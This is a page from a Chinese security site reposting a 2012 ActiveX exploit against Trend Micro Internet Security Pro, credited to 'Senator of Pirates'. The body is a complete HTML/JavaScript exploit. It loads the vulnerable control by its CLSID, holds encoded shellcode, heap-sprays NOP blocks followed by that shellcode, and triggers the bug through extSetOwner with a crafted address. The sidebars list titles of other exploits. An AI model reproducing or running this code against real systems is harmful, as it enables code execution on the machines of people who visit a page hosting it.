首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Trend Micro Internet Security Pro Activex Exploit
来源:Senator.of.Pirates.team@gmail.com 作者:Senator 发布时间:2012-04-05  
###########################################################################################################
Application :Trend Micro Internet Security Pro Activex Exploit
Date : 03/04/2012
Tested on : WinXp EN SP3
Auther : Senator of Pirates
E-Mail : Senator.of.Pirates.team@gmail.com
FaceBook : /SenatorofPirates
Greets : to my friends in anywhere as especially every Moroccan & "ALLAH AL WATAN AL MALIK"
############################################################################################################
<html>
<body>
<object id="target" classid="CLSID:15DBC3F9-9F0A-472E-8061-043D9CEC52F0"></object>
<script>
    shellcode = unescape('%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
                    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
                    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
                    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
                    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
                    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
                    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
                    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e');

nops = unescape ('%u\9090%u\9090');
headersize = 20;


slackspace = headersize + shellcode. length ;
while (nops. length < slackspace) nops += nops;
fillblock= nops.substring(0, slackspace);

block= nops.substring(0, nops. length - slackspace);
while (block. length +slackspace < 0x50000) block= block+ block+ fillblock;

memory= new Array ();
for ( counter=0; counter<250; counter++) memory[counter]= block + shellcode;
target.extSetOwner(unescape('%u1CD9%u7DC6'));
</script>
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·K-Lite Mega Codec Pack 5.7.0 (
·Zend Optimizer 3.3.3 (Windows)
·WM Downloader 3.1.2.2(.pls) Bu
·BlazeVideo HDTV Player 6.6 Pro
·SnackAmp 3.1.3 Malicious aiff
·Sysax <= 5.57 Directory Traver
·Denial of Service in FoxPlayer
·NetOp Remote Control Client 9.
·RichTx32.OCX (TextBox Control
·Xion Audio Player 1.0.127 (.ai
·Microsoft Windows Media Player
·HT Editor Spawning Root Shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved